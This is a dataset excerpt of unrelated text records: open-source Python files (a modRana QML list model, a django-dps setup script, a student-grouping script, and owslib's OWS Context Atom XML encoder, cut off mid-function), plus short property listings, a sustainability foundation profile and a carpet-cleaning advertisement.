text
stringlengths 29
850k
|
|---|
# -*- coding: utf-8 -*-
#----------------------------------------------------------------------------
# A modRana QML GUI list models
#----------------------------------------------------------------------------
# Copyright 2013, Martin Kolman
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#---------------------------------------------------------------------------
# QML list model handling
from PySide import QtCore
# partially based on the gPodderListModel
# list model
class BaseListModel(QtCore.QAbstractListModel):
def __init__(self, objects=None):
QtCore.QAbstractListModel.__init__(self)
if objects is None:
objects = []
self._objects = objects
# self.setRoleNames({0: 'data', 1: 'section'})
self.setRoleNames({0: 'data'})
def sort(self):
# Unimplemented for the generic list model
self.reset()
def insert_object(self, o):
self._objects.append(o)
self.sort()
def remove_object(self, o):
self._objects.remove(o)
self.reset()
def set_objects(self, objects):
self._objects = objects
self.sort()
def get_objects(self):
return self._objects
def get_object(self, index):
return self._objects[index.row()]
def rowCount(self, parent=QtCore.QModelIndex()):
return len(self.get_objects())
def data(self, index, role):
if index.isValid():
if role == 0:
return self.get_object(index)
elif role == 1:
return self.get_object(index).qsection
return None
class NestedListModel(BaseListModel):
def __init__(self):
BaseListModel.__init__(self)
class ListItem(QtCore.QObject):
def __init__(self, data, children=None):
if not children: children = []
QtCore.QObject.__init__(self)
self._data = data
self._children = children
changed = QtCore.Signal()
childrenChanged = QtCore.Signal()
def _getData(self):
return self._data
def _getChildCount(self):
return len(self._children)
@QtCore.Slot(int, result=QtCore.QObject)
def _getChild(self, index):
try:
return self._children[index]
except IndexError:
# index out of bounds
return None
data = QtCore.Property(QtCore.QObject, _getData, notify=changed)
childrenCount = QtCore.Property(QtCore.QObject, _getChildCount, notify=childrenChanged)
class ListItem(QtCore.QObject):
pass
|
Three family home located in the Glenville neighborhood close to East Blvd & St Clair. Updated units, two units are occupied with tenants. Includes full unfinished basement. Each floor has kitchen, living and dining rooms. Third floor unit has one bedroom, second floor has enclosed sun porch. Great potential and generating income. A must see!
Well maintained Investment property. Single family. Long term tenant. Rent income is 850.00 a month.
|
#!/usr/bin/env python
import os
from setuptools import setup, find_packages
# if there's a converted (rst) readme, use it, otherwise fall back to markdown
if os.path.exists('README.rst'):
readme_path = 'README.rst'
else:
readme_path = 'README.md'
# avoid importing the module
exec(open('dps/_version.py').read())
setup(
name='django-dps',
version=__version__,
packages=find_packages(),
license='BSD License',
url="https://github.com/gregplaysguitar/django-dps/",
maintainer="Greg Brown",
maintainer_email="greg@gregbrown.co.nz",
description='Django integrations for the DPS payment gateway',
long_description=open(readme_path).read(),
install_requires=[
'Django>=1.7',
],
include_package_data=True,
package_data={},
classifiers=[
'Environment :: Web Environment',
'Intended Audience :: Developers',
'Operating System :: OS Independent',
'Programming Language :: Python',
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 2.7',
'Framework :: Django',
'License :: OSI Approved :: BSD License',
],
)
|
Rucore was established in 1991. The name Rucore originally stood for Rural Education Development Corporation, now the Rucore Sustainability Foundation, given our focus on rural areas and development through education and long term partnerships.
For the past 22 years Rucore has tested its sustainability thinking at various communities across South Africa, notably at Tlholego Ecovillage (outside Rustenburg in the North West Province). Tlholego is one of the earliest experimental permaculture and ecovillage communities developed in South Africa. The Ecovillage is living testimony to Rucore’s work, a growing cross-cultural community that sustains itself through food production and products, education and training, events and consulting. Two of the directors currently live there as part of the community, constantly applying their thinking at the grassroots level.
At the same time Rucore has been involved in other sustainable community projects, notably rainwater harvesting, food gardening and sanitation at Thandanani (in the Mambulu Village near Kranskop in Kwazulu Natal) for the past 15 years. In 2011 Rucore became involved in pioneering ecologically sustainable sanitation technology at Cata Village in the Eastern Cape. Rucore is currently working with emerging farmers in Skuinsdrift area to develop a Multi-purpose Centre and enterprise hub based on traditional building technologies and organic farming.
|
#!/usr/bin python
# simple script to select group of students at random.
# Written by Bill Kronholm
# Sep 1, 2014
# No rights reserved.
from random import shuffle
from time import strftime
import subprocess # used for printing
# list of students names as strings
students = [
"Karmen Rosebrock",
"Erna Halm",
"Krystle Poage",
"Dori Renick",
"Scot Mayr",
"Kenyetta Fyock",
"Nicola Wind",
"Janee Garibaldi",
"Dot Tinkham",
"Kathy Christian",
"Kym Costigan",
"Sharolyn Rondon",
"Samira Poudrier",
"Cythia Licon",
"Madelene Sherry",
"Ignacia Riemann",
"Vince Edmundson",
"Sharyl Buch",
"Mayola Balk",
"Leonia Simek"
]
groupsize = 3 # how many people in each group
numberofstudents = len(students)
numberofgroups = numberofstudents/groupsize
groups = {n:[] for n in range(numberofgroups)}
shuffle(students) # randomize the list
n=0
# separate into groups
while len(students) > 0:
groups[n].append(students.pop(0))
n = (n+1)%numberofgroups
# txt file to save to
today = strftime("%Y%m%d")
f = open(today+".txt", 'w')
# print them out and save to txt file
for key in groups.keys():
print "Group", key
f.write("Group "+str(key)+"\n")
for x in groups[key]:
f.write(x+"\n")
print x
f.write("\n")
print ""
# close the txt file
f.close()
# open the txt file for reading
f = open(today+".txt", 'r')
# print the txt file
# code taken from
# http://stackoverflow.com/questions/12723818/print-to-standard-printer-from-python
lpr = subprocess.Popen("/usr/bin/lpr", stdin = subprocess.PIPE)
lpr.stdin.write(f.read())
# close the txt file again
f.close()
print "Done. Go check the printer."
|
Welcome to my site, My name is Andy Hogarth and I am a LOCAL, friendly and family based carpet cleaner with 10 years experience in carpet cleaning, I strive for perfection in all my carpets.
I Run a powerful truck mounted unit, a machine that boasts excellent results with rapid dry times, providing it’s own power source, water supply and waste water removal.
Catering for domestic and commercial clients at a time to suit.
Please feel free to contact me with any queries or to book a free, no obligation survey. Thank you for visiting my site.
My standard clean is a hot water extraction clean using my truck mounted unit, using specially selected pre sprays bespoke to your needs and level of soiling I can clean and rinse your carpets and upholstery to very high standards.
Eco-clean is a safer option for the environment, the product used is an optimized colloidal agent which holds oil & dirt in colloidal suspension with no re-deposition fully flushed out with a high powered fresh water rinse.
From domestic dry compound cleaning for light soiling to ‘encapsulation’ cleaning using a powerfull cimex tri rotating floor machine for commercial areas. Perfect for office and business environments.
|
# -*- coding: utf-8 -*-
# =============================================================================
# Authors : Alexander Kmoch <allixender@gmail.com>
#
# =============================================================================
"""
API for OGC Web Services Context Document (OWS Context) format.
ATOM XML Encoding: http://www.opengeospatial.org/standards/owc
OGC OWS Context Atom Encoding Standard 1.0 (12-084r2)
"""
from owslib.etree import etree, ParseError
from owslib import util
from owslib.namespaces import Namespaces
from owslib.util import nspath_eval, element_to_string
from owslib.util import log
from owslib.owscontext.common import is_empty, extract_p, \
try_int, try_float
# default variables
add_namespaces = {"georss": "http://www.georss.org/georss",
"owc": "http://www.opengis.net/owc/1.0",
"xml": "http://www.w3.org/XML/1998/namespace"}
def get_namespaces():
n = Namespaces()
ns = n.get_namespaces(["atom", "dc", "gml", "gml32", "xlink"])
ns.update(add_namespaces)
ns[None] = n.get_namespace("atom")
return ns
ns = get_namespaces()
def nspv(path):
"""
short-hand syntax seen in waterml2.py
:param path: xpath namespace aware
:return: xml element
"""
return nspath_eval(path, ns)
def ns_elem(ns_prefix, elem_name):
ns_uri = ns.get(ns_prefix)
if ns_uri is not None:
return """{%(ns_uri)s}%(elem_name)s""" % {"ns_uri": ns_uri,
"elem_name": elem_name}
def parse_owc_content(content_node):
mimetype = util.testXMLAttribute(content_node, 'type')
url = util.testXMLAttribute(content_node, 'href')
title = util.testXMLAttribute(content_node, 'title')
child_elem = None
if len(list(content_node)) > 0:
child_elem = element_to_string(
list(content_node)[0], False)
content_dict = {
"type": mimetype,
"url": url,
"content": str(child_elem),
"title": title
}
return content_dict
def parse_entry(entry_node):
"""
parse an aotm entry into a feature/resource dict to build OwcResource from
:param entry_node: xml element root node of the atom:entry
:return: dictionary for OwcResource.from_dict()
"""
resource_base_dict = {
"type": "Feature",
"id": None,
"geometry": None,
"properties": {
'title': None,
'abstract': None,
'updated': None,
'date': None,
'authors': [],
'publisher': None,
'rights': None,
'categories': [],
"links": {
"alternates": [],
"previews": [],
"data": [],
"via": [],
},
'offerings': [],
'active': None,
'minscaledenominator': None,
'maxscaledenominator': None,
'folder': None
}
}
# <id>ftp://ftp.remotesensing.org/pub/geotiff/samples/gdal_eg/cea.txt</id>
val = entry_node.find(util.nspath_eval('atom:id', ns))
id = util.testXMLValue(val)
# log.debug("entry :id %s :: %s", id, val)
resource_base_dict.update({"id": id})
# <title>GeoTIFF Example</title>
val = entry_node.find(util.nspath_eval('atom:title', ns))
title = util.testXMLValue(val)
# log.debug("entry: title %s :: %s", id, val)
resource_base_dict['properties'].update({"title": title})
# <updated>2011-11-01T00:00:00Z</updated>
val = entry_node.find(util.nspath_eval('atom:updated', ns))
update_date = util.testXMLValue(val)
# log.debug("entry: updated %s :: %s", update_date, val)
resource_base_dict['properties'].update({"updated": update_date})
# <dc:publisher>
val = entry_node.find(util.nspath_eval('dc:publisher', ns))
publisher = util.testXMLValue(val)
# log.debug("entry: dc:publisher %s :: %s", publisher, val)
resource_base_dict['properties'].update({"publisher": publisher})
# <dc:rights>
val = entry_node.find(util.nspath_eval('dc:rights', ns))
rights = util.testXMLValue(val)
# log.debug("entry: rights %s :: %s", rights, val)
resource_base_dict['properties'].update({"rights": rights})
# <georss:where>
val = entry_node.find(util.nspath_eval('georss:where', ns))
if val is not None:
if len(list(val)) > 0:
# xmltxt = etree.tostring(
# list(val)[0], encoding='utf8', method='xml')
xmltxt = element_to_string(
list(val)[0], False)
# TODO here parse geometry??
# log.debug("entry: geometry %s :: %s", xmltxt, val)
resource_base_dict.update({"geometry": xmltxt.decode('utf-8')})
# <content type = "text" > aka subtitle, aka abstract
val = entry_node.find(util.nspath_eval('atom:content', ns))
subtitle = util.testXMLValue(val)
# log.debug("entry: subtitle %s :: %s", subtitle, val)
resource_base_dict['properties'].update({"abstract": subtitle})
# <author> ..
# <name>
# <email>
vals = entry_node.findall(util.nspath_eval('atom:author', ns))
authors = []
for val in vals:
val_name = val.find(util.nspath_eval('atom:name', ns))
val_email = val.find(util.nspath_eval('atom:email', ns))
val_uri = val.find(util.nspath_eval('atom:uri', ns))
name = util.testXMLValue(val_name)
email = util.testXMLValue(val_email)
uri = util.testXMLValue(val_uri)
author = {
"name": name,
"email": email,
"uri": uri
}
# log.debug("entry: author %s :: %s", author, vals)
if not is_empty(author):
authors.append(author)
resource_base_dict['properties'].update({"authors": authors})
# <link rel="enclosure" type="image/png"
# length="12345" title="..." href="http://o..."/>
# <link rel="icon" type="image/png" title="Preview f..."
# href="http://..."/>
# <link rel="via" type="application/vnd.ogc.wms_xml"
# title="Original .." href="...."/>
vals = entry_node.findall(util.nspath_eval('atom:link', ns))
links_alternates = []
links_previews = []
links_data = []
links_via = []
for val in vals:
rel = util.testXMLAttribute(val, 'rel')
href = util.testXMLAttribute(val, 'href')
mimetype = util.testXMLAttribute(val, 'type')
lang = util.testXMLAttribute(val, 'lang')
title = util.testXMLAttribute(val, 'title')
length = util.testXMLAttribute(val, 'length')
link = {
"href": href,
"type": mimetype,
"length": length,
"lang": lang,
"title": title,
"rel": rel
}
# log.debug("entry: link %s :: %s", link, vals)
if link.get("rel") == "alternate" and not is_empty(link):
links_alternates.append(link)
elif link.get("rel") == "icon" and not is_empty(link):
links_previews.append(link)
elif link.get("rel") == "enclosure" and not is_empty(link):
links_data.append(link)
elif link.get("rel") == "via" and not is_empty(link):
links_via.append(link)
else:
log.warn(
"unknown link type in Ows Resource entry section: %r", link)
resource_base_dict['properties']['links'].update(
{"alternates": links_alternates})
resource_base_dict['properties']['links'].update(
{"previews": links_previews})
resource_base_dict['properties']['links'].update({"data": links_data})
resource_base_dict['properties']['links'].update({"via": links_via})
# <owc:offering code="http://www.opengis.net/spec/owc-at...">
# <owc:content type="image/tiff" href=".."
# <owc:offering code="http://www.opengis.net/spec....l">
# <owc:content type="application/gml+xml">
# <owc:operation code="GetCapabilities" method="GET"
# type="applica..." href="..."
# <owc:request type="application/xml"> ..
# <owc:styleSet>
# <owc:name>raster</owc:name>
# <owc:title>Default Raster</owc:title>
# <owc:abstract>A sample style that draws a </owc:abstract>
# <owc:legendURL href="h...." type="image/png"/>
# </owc:styleSet>
offering_nodes = entry_node.findall(util.nspath_eval('owc:offering', ns))
offerings = []
for offering_node in offering_nodes:
offering_code = util.testXMLAttribute(offering_node, 'code')
operations = []
contents = []
styles = []
operation_nodes = offering_node.findall(
util.nspath_eval('owc:operation', ns))
for op_val in operation_nodes:
operations_code = util.testXMLAttribute(op_val, 'code')
http_method = util.testXMLAttribute(op_val, 'method')
mimetype = util.testXMLAttribute(op_val, 'type')
request_url = util.testXMLAttribute(op_val, 'href')
req_content_val = val.find(util.nspath_eval('owc:request', ns))
req_content = None
if req_content_val is not None:
req_content = parse_owc_content(req_content_val)
# TODO no example for result/response
op_dict = {
"code": operations_code,
"method": http_method,
"type": mimetype,
"href": request_url,
"request": None if is_empty(req_content) else req_content,
"result": None
}
# log.debug("entry: operation %s :: %s", op_dict, vals)
if not is_empty(op_dict):
operations.append(op_dict)
content_nodes = offering_node.findall(
util.nspath_eval('owc:content', ns))
for cont_val in content_nodes:
content_dict = parse_owc_content(cont_val)
# log.debug("entry: content_dict %s :: %s", content_dict, vals)
if not is_empty(content_dict):
contents.append(content_dict)
style_nodes = offering_node.findall(
util.nspath_eval('owc:styleSet', ns))
for style_val in style_nodes:
val_name = style_val.find(util.nspath_eval('owc:name', ns))
val_title = style_val.find(util.nspath_eval('owc:title', ns))
val_abstr = style_val.find(util.nspath_eval('owc:abstract', ns))
val_uri = style_val.find(util.nspath_eval('owc:legendURL', ns))
name = util.testXMLValue(val_name)
title = util.testXMLValue(val_title)
abstr = util.testXMLValue(val_abstr)
legend_url = util.testXMLAttribute(val_uri, 'href')
style_set = {
"name": name,
"title": title,
"abstract": abstr,
"default": None,
"legendURL": legend_url,
"content": None
}
# log.debug("entry: style_set %s :: %s", style_set, vals)
if not is_empty(style_set):
styles.append(style_set)
offering_dict = {
"code": offering_code,
"operations": operations,
"contents": contents,
"styles": styles
}
if offering_code is not None:
offerings.append(offering_dict)
resource_base_dict['properties'].update(
{"offerings": offerings})
# TODO no examples for active attribute
# <owc:minScaleDenominator>2500</owc:minScaleDenominator>
val = entry_node.find(util.nspath_eval('owc:minScaleDenominator', ns))
min_scale_denominator = util.testXMLValue(val)
# log.debug("entry: min-scale-... %s :: %s", min_scale_denominator, val)
resource_base_dict['properties'].update(
{"minscaledenominator": min_scale_denominator})
# <owc:maxScaleDenominator>25000</owc:maxScaleDenominator>
val = entry_node.find(util.nspath_eval('owc:maxScaleDenominator', ns))
max_scale_denominator = util.testXMLValue(val)
# log.debug("entry: max_scale_... %s :: %s", max_scale_denominator, val)
resource_base_dict['properties'].update(
{"maxscaledenominator": max_scale_denominator})
# TODO no examples for folder attribute
return resource_base_dict
def decode_atomxml(xml_string):
"""
here parse atom xml to a dict for instanciating of OWC:Context
:param xmlstring:
:return: OwcContext-ready dict
"""
context_base_dict = {
"type": "FeatureCollection",
"id": None,
"bbox": None,
"properties": {
"lang": None,
"links": {
"profiles": [],
"via": [],
},
'title': None,
'abstract': None,
'updated': None,
'authors': [],
'publisher': None,
'generator': None,
'display': None,
'rights': None,
'date': None,
'categories': [],
},
'features': []
}
feed_root = etree.fromstring(xml_string)
# feed_root = etree.parse(xml_bytes)
# feed_root xml lang use?
# # log.debug(feed_root)
# feed xml:lang=en
# lang = feed_root.get('{http://www.w3.org/XML/1998/namespace}lang')
lang = util.testXMLAttribute(
feed_root, '{http://www.w3.org/XML/1998/namespace}lang')
# log.debug("lang %s ", lang)
context_base_dict['properties'].update({"lang": lang})
# <id>
val = feed_root.find(util.nspath_eval('atom:id', ns))
id = util.testXMLValue(val)
# log.debug("id %s :: %s", id, val)
context_base_dict.update({"id": id})
# <link rel="profile"
# href="http://www.opengis.net/spec/owc-atom/1.0/req/core"
# title="compliant bla bla"
# < link rel = "via" type = "application/xml" href = "..." title = "..."
vals = feed_root.findall(util.nspath_eval('atom:link', ns))
links_profile = []
links_via = []
for val in vals:
rel = util.testXMLAttribute(val, 'rel')
href = util.testXMLAttribute(val, 'href')
mimetype = util.testXMLAttribute(val, 'type')
lang = util.testXMLAttribute(val, 'lang')
title = util.testXMLAttribute(val, 'title')
length = util.testXMLAttribute(val, 'length')
link = {
"href": href,
"type": mimetype,
"length": length,
"lang": lang,
"title": title,
"rel": rel
}
# log.debug("link %s :: %s", link, vals)
if link.get("rel") == "profile" and not is_empty(link):
links_profile.append(link)
elif link.get("rel") == "via" and not is_empty(link):
links_via.append(link)
else:
log.warn("unknown link type in Ows Context section: %r", link)
context_base_dict['properties']['links'].update(
{"profiles": links_profile})
context_base_dict['properties']['links'].update({"via": links_via})
# <title>
val = feed_root.find(util.nspath_eval('atom:title', ns))
title = util.testXMLValue(val)
# log.debug("title %s :: %s", title, val)
context_base_dict['properties'].update({"title": title})
# <subtitle type = "html"
val = feed_root.find(util.nspath_eval('atom:subtitle', ns))
subtitle = util.testXMLValue(val)
# log.debug("subtitle %s :: %s", subtitle, val)
context_base_dict['properties'].update({"abstract": subtitle})
# <author> ..
# <name>
# <email>
vals = feed_root.findall(util.nspath_eval('atom:author', ns))
authors = []
for val in vals:
val_name = val.find(util.nspath_eval('atom:name', ns))
val_email = val.find(util.nspath_eval('atom:email', ns))
val_uri = val.find(util.nspath_eval('atom:uri', ns))
name = util.testXMLValue(val_name)
email = util.testXMLValue(val_email)
uri = util.testXMLValue(val_uri)
author = {
"name": name,
"email": email,
"uri": uri
}
# log.debug("author %s :: %s", author, vals)
if not is_empty(author):
authors.append(author)
context_base_dict['properties'].update({"authors": authors})
# <georss:where>
val = feed_root.find(util.nspath_eval('georss:where', ns))
if val is not None:
if len(list(val)) > 0:
xmltxt = element_to_string(
list(val)[0], False)
# log.debug("geometry %s :: %s", xmltxt, val)
context_base_dict['properties'].update({"bbox": xmltxt.decode('utf-8')})
# <updated>2012-11-04T17:26:23Z</updated>
val = feed_root.find(util.nspath_eval('atom:updated', ns))
update_date = util.testXMLValue(val)
# log.debug("updated %s :: %s", update_date, val)
context_base_dict['properties'].update({"updated": update_date})
# <dc:date>2009-01-23T09:08:56.000Z/2009-01-23T09:14:08.000Z</dc:date>
val = feed_root.find(util.nspath_eval('dc:date', ns))
time_interval_of_interest = util.testXMLValue(val)
# log.debug("dc:date %s :: %s", time_interval_of_interest, val)
context_base_dict['properties'].update(
{"date": time_interval_of_interest})
# <rights>
val = feed_root.find(util.nspath_eval('atom:rights', ns))
rights = util.testXMLValue(val)
# log.debug("rights %s :: %s", rights, val)
context_base_dict['properties'].update({"rights": rights})
# <dc:publisher>
val = feed_root.find(util.nspath_eval('dc:publisher', ns))
publisher = util.testXMLValue(val)
# log.debug("dc:publisher %s :: %s", publisher, val)
context_base_dict['properties'].update({"publisher": publisher})
# <owc:display>
# <owc:pixelWidth>
val_display = feed_root.find(util.nspath_eval('owc:display', ns))
val_pixel_width = None if val_display is None \
else val_display.find(util.nspath_eval('owc:pixelWidth', ns))
val_pixel_height = None if val_display is None \
else val_display.find(util.nspath_eval('owc:pixelHeight', ns))
val_mm_per_pixel = None if val_display is None \
else val_display.find(util.nspath_eval('owc:mmPerPixel', ns))
pixel_width = util.testXMLValue(val_pixel_width)
pixel_height = util.testXMLValue(val_pixel_height)
mm_per_pixel = util.testXMLValue(val_mm_per_pixel)
owc_display = {
"pixelWidth": pixel_width,
"pixelHeight": pixel_height,
"mmPerPixel": mm_per_pixel
}
# log.debug("display %s :: %s", owc_display, val_display)
if not is_empty(owc_display):
context_base_dict['properties'].update({"display": owc_display})
# <generator uri="http://w.." version="1.0">MiraMon</generator>
val = feed_root.find(util.nspath_eval('atom:generator', ns))
name = util.testXMLValue(val)
version = util.testXMLAttribute(val, 'version')
uri = util.testXMLAttribute(val, 'uri')
owc_generator = {
"name": name,
"version": version,
"uri": uri
}
# log.debug("generator %s :: %s", owc_generator, val)
if not is_empty(owc_generator):
context_base_dict['properties'].update({"generator": owc_generator})
# <category term="maps" label="This file contains maps"/>
vals = feed_root.findall(util.nspath_eval('atom:category', ns))
categories = []
for val in vals:
term = util.testXMLAttribute(val, 'term')
scheme = util.testXMLAttribute(val, 'scheme')
label = util.testXMLAttribute(val, 'label')
category = {
"term": term,
"scheme": scheme,
"label": label
}
# log.debug("category %s :: %s", category, vals)
if not is_empty(category):
categories.append(category)
context_base_dict['properties'].update({"categories": categories})
# <entry> ...
entries = feed_root.findall(util.nspath_eval('atom:entry', ns))
resources = []
for entry in entries:
entry_dict = parse_entry(entry)
if entry_dict.get("id") is not None:
resources.append(entry_dict)
else:
log.warn("feature entry has no id, not allowed: skipping!")
context_base_dict.update({"features": resources})
return context_base_dict
def encode_atomxml(obj_d):
"""
encode instance of OwcContext dict into atom xml encoding,
because we can't do circular imports
:param obj_d: the dict from owscontext to dict
:return: b'atomxml'
"""
# try:
# xml_tree = axml_context(obj_d)
# tree = etree.ElementTree(xml_tree)
# return tree
# except TypeError as te:
# log.warn('problem encoding context to xml', te)
# raise te
# except AttributeError as ae:
# log.warn('problem encoding context to xml', ae)
# raise ae
# except ValueError as ve:
# log.warn('problem encoding context to xml', ve)
# raise ve
# except ParseError as pe:
# log.warn('problem encoding context to xml', pe)
# raise pe
xml_tree = axml_context(obj_d)
tree = etree.ElementTree(xml_tree)
return element_to_string(tree, encoding='utf-8', xml_declaration=False)
def axml_context(d):
"""
encodes base OwcContext as dict to atom xml tree
:param d:
:return:
"""
xml = etree.Element("feed", nsmap=ns)
etree.SubElement(xml, "id").text = d['id']
spec_reference = [axml_link(do) for do in
extract_p('properties.links.profiles', d, [])]
[xml.append(el) for el in spec_reference if el is not None]
area_of_interest = extract_p('bbox', d, None)
if area_of_interest is not None:
try:
gml = etree.fromstring(area_of_interest)
georss = etree.SubElement(xml, ns_elem("georss", "where"))
georss.append(gml)
except Exception as ex:
log.warn('could encode bbox into georss:where', ex)
pass
context_metadata = [axml_link(do) for do in
extract_p('properties.links.via', d, [])]
[xml.append(el) for el in context_metadata if el is not None]
language = extract_p('properties.lang', d, None)
if language is not None:
xml.set(ns_elem("xml", "lang"), language)
title = extract_p('properties.title', d, None)
if title is not None:
etree.SubElement(xml, "title").text = title
# <subtitle type = "html"
subtitle = extract_p('properties.abstract', d, None)
if subtitle is not None:
etree.SubElement(xml, "subtitle").text = subtitle
update_date = extract_p('properties.updated', d, None)
if update_date is not None:
etree.SubElement(xml, "updated").text = update_date
authors = [axml_author(do) for do in extract_p('properties.authors', d, [])]
[xml.append(el) for el in authors if el is not None]
publisher = extract_p('properties.publisher', d, None)
if publisher is not None:
etree.SubElement(xml, ns_elem("dc", "publisher")).text = publisher
creator_application = axml_creator_app(extract_p('properties.generator', d, None))
if creator_application is not None and not is_empty(creator_application):
xml.append(creator_application)
creator_display = axml_display(extract_p('properties.display', d, None))
if creator_display is not None:
xml.append(creator_display)
rights = extract_p('properties.rights', d, None)
if rights is not None:
etree.SubElement(xml, "rights").text = rights
time_interval_of_interest = extract_p('properties.date', d, None)
if time_interval_of_interest is not None:
etree.SubElement(xml, ns_elem("dc", "date")).text = time_interval_of_interest
keywords = [axml_category(do) for do in
extract_p('properties.categories', d, [])]
[xml.append(el) for el in keywords if el is not None]
# here we generate single elements and attach them
resources = [axml_resource(do) for do in
extract_p('features', d, [])]
[xml.append(el) for el in resources if el is not None]
return xml
def axml_resource(d):
"""
encodes an OwcResource as dict into atom xml tree
:param d:
:return:
"""
entry = etree.Element("entry", nsmap=ns)
etree.SubElement(entry, "id").text = d['id']
geospatial_extent = extract_p('geometry', d, None)
if geospatial_extent is not None:
try:
gml = etree.fromstring(geospatial_extent)
georss = etree.SubElement(entry, ns_elem("georss", "where"))
georss.append(gml)
except Exception as ex:
log.warn('could encode geometry into georss:where', ex)
pass
title = d['properties']['title']
if title is not None:
etree.SubElement(entry, "title").text = title
subtitle = extract_p('properties.abstract', d, None)
# <content type = "text" >
if subtitle is not None:
etree.SubElement(entry, "content").text = subtitle
update_date = extract_p('properties.updated', d, None)
if update_date is not None:
etree.SubElement(entry, "updated").text = update_date
authors = [axml_author(do) for do in
extract_p('properties.authors', d, [])]
[entry.append(el) for el in authors if el is not None]
publisher = extract_p('properties.publisher', d, None)
if update_date is not None:
etree.SubElement(entry, ns_elem("dc", "publisher")).text = publisher
rights = extract_p('properties.rights', d, None)
if update_date is not None:
etree.SubElement(entry, ns_elem("dc", "rights")).text = rights
temporal_extent = extract_p('properties.date', d, None)
if temporal_extent is not None:
etree.SubElement(entry, "date").text = temporal_extent
keywords = [axml_category(do) for do in
extract_p('properties.categories', d, [])]
[entry.append(el) for el in keywords if el is not None]
resource_metadata = [axml_link(do) for do in
extract_p('properties.links.via', d, [])]
[entry.append(el) for el in resource_metadata if el is not None]
content_description = [axml_content(do)
for do in extract_p('properties.links.alternates', d, [])]
[entry.append(el) for el in content_description if el is not None]
preview = [axml_link(do) for do in
extract_p('properties.links.preview', d, [])]
[entry.append(el) for el in preview if el is not None]
content_by_ref = [axml_link(do) for do in
extract_p('properties.links.data', d, [])]
[entry.append(el) for el in content_by_ref if el is not None]
offerings = [axml_offering(do) for do in
extract_p('properties.offerings', d, [])]
[entry.append(el) for el in offerings if el is not None]
# TODO no examples for active attribute
active = extract_p('properties.active', d, None)
if active is not None:
etree.SubElement(entry, "active").text = active
min_scale_denominator = try_float(extract_p(
'properties.minscaledenominator', d, None))
# <owc:minScaleDenominator>2500</owc:minScaleDenominator>
if min_scale_denominator is not None:
etree.SubElement(entry, ns_elem(
"owc", "minScaleDenominator")).text = str(min_scale_denominator)
max_scale_denominator = try_float(extract_p(
'properties.maxscaledenominator', d, None))
# <owc:maxScaleDenominator>25000</owc:maxScaleDenominator>
if max_scale_denominator is not None:
etree.SubElement(entry, ns_elem(
"owc", "maxScaleDenominator")).text = str(max_scale_denominator)
# TODO no examples for folder attribute
folder = extract_p('properties.folder', d, None)
if folder is not None:
etree.SubElement(entry, "folder").text = folder
# xml.append(entry)
return entry
def axml_creator_app(d):
# <generator uri="http://w.." version="1.0">MiraMon</generator>
if is_empty(d):
return None
else:
try:
creator_app = etree.Element("generator", nsmap=ns)
title = extract_p('title', d, None)
if title is not None:
creator_app.text = title
uri = extract_p('uri', d, None)
if uri is not None:
creator_app.set("uri", uri)
version = extract_p('version', d, None)
if version is not None:
creator_app.set("version", version)
return creator_app
except Exception as ex:
log.warn('could encode creator_app', ex)
return None
def axml_display(d):
# <owc:display>
# <owc:pixelWidth>
if is_empty(d):
return None
else:
try:
creator_display = etree.Element(ns_elem("owc", "display"), nsmap=ns)
pixel_width = try_int(extract_p('pixelWidth', d, None))
if pixel_width is not None:
etree.SubElement(creator_display, ns_elem(
"owc", "pixelWidth")).text = str(pixel_width)
pixel_height = try_int(extract_p('pixelHeight', d, None))
if pixel_height is not None:
etree.SubElement(creator_display, ns_elem(
"owc", "pixelHeight")).text = str(pixel_height)
mm_per_pixel = try_float(extract_p('mmPerPixel', d, None))
if mm_per_pixel is not None:
etree.SubElement(creator_display, ns_elem(
"owc", "mmPerPixel")).text = str(mm_per_pixel)
return creator_display
except Exception as ex:
log.warn('could encode creator_display', ex)
return None
def axml_link(d):
# < link rel = "via" type = "application/xml" href = "..." title = "..."
if is_empty(d):
return None
else:
try:
link = etree.Element("link", nsmap=ns)
href = extract_p('href', d, None)
if href is not None:
link.set("href", href)
rel = extract_p('rel', d, None)
if rel is not None:
link.set("rel", rel)
mimetype = extract_p('type', d, None)
if mimetype is not None:
link.set("type", mimetype)
lang = extract_p('lang', d, None)
if lang is not None:
link.set("lang", lang)
title = extract_p('title', d, None)
if title is not None:
link.set("title", title)
length = try_int(extract_p('length', d, None))
if length is not None:
link.set("length", str(length))
return link
except Exception as ex:
log.warn('could not encode link', ex)
return None
def axml_category(d):
# <category term="maps" label="This file contains maps"/>
if is_empty(d):
return None
else:
try:
category = etree.Element("category", nsmap=ns)
term = extract_p('term', d, None)
if term is not None:
category.set("term", term)
scheme = extract_p('scheme', d, None)
if scheme is not None:
category.set("scheme", scheme)
label = extract_p('label', d, None)
if label is not None:
category.set("label", label)
return category
except Exception as ex:
log.warn('could encode category', ex)
return None
def axml_author(d):
# <author> ..
# <name>
# <email>
if is_empty(d):
return None
else:
try:
author = etree.Element("author", nsmap=ns)
name = extract_p('name', d, None)
if name is not None:
etree.SubElement(author, "name").text = name
email = extract_p('email', d, None)
if email is not None:
etree.SubElement(author, "email").text = email
uri = extract_p('uri', d, None)
if uri is not None:
etree.SubElement(author, "uri").text = uri
return author
except Exception as ex:
log.warn('could encode author', ex)
return None
def axml_offering(d):
# <owc:offering code="http://www.opengis.net/spec/owc-at...">
# <owc:offering code="http://www.opengis.net/spec....l">
# <owc:content type="application/gml+xml">
if is_empty(d):
return None
else:
try:
offering_code = extract_p('code', d, None)
offering = etree.Element(ns_elem("owc", "offering"), attrib={"code": offering_code}, nsmap=ns)
# use axml_operation here
operations = [axml_operation(do) for do in
extract_p('operations', d, [])]
[offering.append(el) for el in operations if el is not None]
# use axml_content here
contents = [axml_content(do) for do in
extract_p('contents', d, [])]
[offering.append(el) for el in contents if el is not None]
# use axml_styeset here
styles = [axml_styleset(do) for do in
extract_p('styles', d, [])]
[offering.append(el) for el in styles if el is not None]
return offering
except Exception as ex:
log.warn('could encode offering', ex)
return None
def axml_operation(d):
# <owc:operation code="GetCapabilities" method="GET"
# type="applica..." href="..."
# <owc:request type="application/xml"> ..
